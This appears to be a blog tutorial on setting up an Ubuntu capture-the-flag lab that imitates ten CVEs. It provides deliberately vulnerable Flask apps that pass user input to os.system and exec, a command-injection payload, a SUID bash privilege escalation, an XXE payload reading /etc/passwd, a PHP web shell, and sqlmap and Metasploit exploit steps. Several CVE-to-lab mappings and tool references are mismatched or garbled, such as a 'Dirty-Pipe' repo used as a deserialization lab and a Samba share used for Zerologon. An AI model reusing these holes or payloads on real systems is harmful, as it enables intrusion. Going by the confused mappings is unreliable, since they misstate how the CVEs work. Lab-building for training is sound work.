Siddhant Academy

Simulating Real-World Vulnerabilities for Cybersecurity Challenges

Siddhant Bhattarai's photo
Siddhant Bhattarai
·

3 min read

To simulate these vulnerabilities on an Ubuntu server, you can replicate them using vulnerable frameworks, web applications, scripts, and open-source projects that mimic similar behavior. Here's a guide to set up and simulate each CVE:

General Setup Prerequisites:

  1. Update Ubuntu:

     sudo apt update && sudo apt upgrade -y

  2. Install Required Tools:

     sudo apt install apache2 mysql-server python3 python3-pip docker.io metasploit-framework -y
 sudo systemctl start apache2

1. CVE-2024-3400 (Command Injection on GlobalProtect PAN-OS)

Simulation Steps:

  • Use a vulnerable Flask app that allows file creation and command injection.

Flask App Simulation Code:

pip3 install flask
nano global_protect_vuln.py

Add the following code:

from flask import Flask, request
import os

app = Flask(__name__)

@app.route("/upload", methods=["POST"])
def upload():
    filename = request.form.get("filename")
    cmd = f"touch /tmp/{filename}"  # Simulates arbitrary file creation.
    os.system(cmd)
    return "File created successfully!"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080)

Run the app:

python3 global_protect_vuln.py
  • Test command injection:
curl -X POST -d "filename=test; whoami" http://<your-ip>:8080/upload

2. CVE-2024-1709 (Authentication Bypass - ConnectWise ScreenConnect)

Simulation Steps:

  • Set up DVWA (Damn Vulnerable Web App) for Authentication Bypass Simulation.
git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo systemctl restart apache2
  • Access DVWA at http://<your-ip>/dvwa/ and create an SQLMap authentication bypass:
sqlmap -u "http://<your-ip>/dvwa/login.php" --data="username=admin&password=admin" --level=5

3. CVE-2024-1651 (Insecure Deserialization - Torrentpier)

Simulation Steps:

  • Install Insecure Deserialization Lab:
git clone https://github.com/swisskyrepo/Dirty-Pipe-Exploit-Lab /home/deserialize_lab
cd /home/deserialize_lab
docker-compose up
  • Access the application:
http://<your-ip>:8000
  • Insert serialized malicious payloads.

4. CVE-2024-12552 (Local Privilege Escalation - Wacom Center)

Simulation Steps:

  • Install GTFOBins SUID Binary:
cp /bin/bash /tmp/vuln
sudo chmod u+s /tmp/vuln
  • Execute:
/tmp/vuln -p
  • Verify root access:
id

5. CVE-2024-55887 (XML External Entity (XXE) Injection)

Simulation Steps:

  • Use OWASP WebGoat for XML External Entity (XXE) exercises:
docker pull webgoat/webgoat
docker run -p 8080:8080 webgoat/webgoat
  • Access WebGoat:
http://<your-ip>:8080
  • Navigate to XXE Lessons and upload malicious XML payload:
<?xml version="1.0" ?>
<!DOCTYPE root [ <!ENTITY read SYSTEM "file:///etc/passwd"> ]>
<user>&read;</user>

6. CVE-2024-54351 (CSRF and Stored XSS - Tom Landis Fancy Roller Scroller)

Simulation Steps:

  • Install bWAPP (Buggy Web App):
git clone https://github.com/raesene/bWAPP.git /var/www/html/bwapp
sudo systemctl restart apache2

  • Access bWAPP and log in.

  • Perform CSRF attack:

curl -X POST "http://<your-ip>/bwapp/vulnerable_csrf.php" -d "data=<malicious_script>"

7. CVE-2022-30190 (MSDT Remote Code Execution)

Simulation Steps:

  • Create a vulnerable Python-based Word-like document parser:
pip3 install flask
nano msdt_vuln.py

Add:

from flask import Flask, request

app = Flask(__name__)

@app.route("/msdt", methods=["POST"])
def msdt():
    command = request.form.get("command")
    exec(command)  # Simulated RCE vulnerability.
    return "Executed!"

if __name__ == "__main__":
    app.run(port=9000)

Run:

python3 msdt_vuln.py

8. CVE-2024-0204 (GoAnywhere MFT Auth Bypass)

Simulation Steps:

  • Use Metasploit:
msfconsole
use exploit/linux/http/goanywhere_mft_auth_bypass
set RHOST <target_ip>
set RPORT 9000
exploit

9. CVE-2020-1472 (Netlogon Exploit - "Zerologon")

Simulation Steps:

  • Set up a Samba server:
sudo apt-get install samba
sudo nano /etc/samba/smb.conf

Add:

[netlogon]
path = /srv/samba/netlogon
read only = no
guest ok = yes

Restart:

sudo systemctl restart smbd
  • Use impacket for exploit:
git clone https://github.com/SecureAuthCorp/impacket
python3 zerologon_tester.py <IP>

10. CVE-2024-6110 (File Upload Exploit - Magbanua Beach Resort)

Simulation Steps:

  • Use Mutillidae for unrestricted file upload:
git clone https://github.com/webpwnized/mutillidae /var/www/html/mutillidae
sudo systemctl restart apache2

  • Navigate to the Unrestricted File Upload challenge.

  • Upload a PHP reverse shell:

<?php system($_GET["cmd"]); ?>

Final Setup for CTF Challenges:

  1. Monitoring: Use tcpdump and Wireshark:

     sudo tcpdump -i eth0 port 80

  2. Flags and Clues: Place flag.txt files with encoded hints in /var/www/html/flags/.

  3. Snapshot: Take a VM snapshot after installation to restore in case of issues.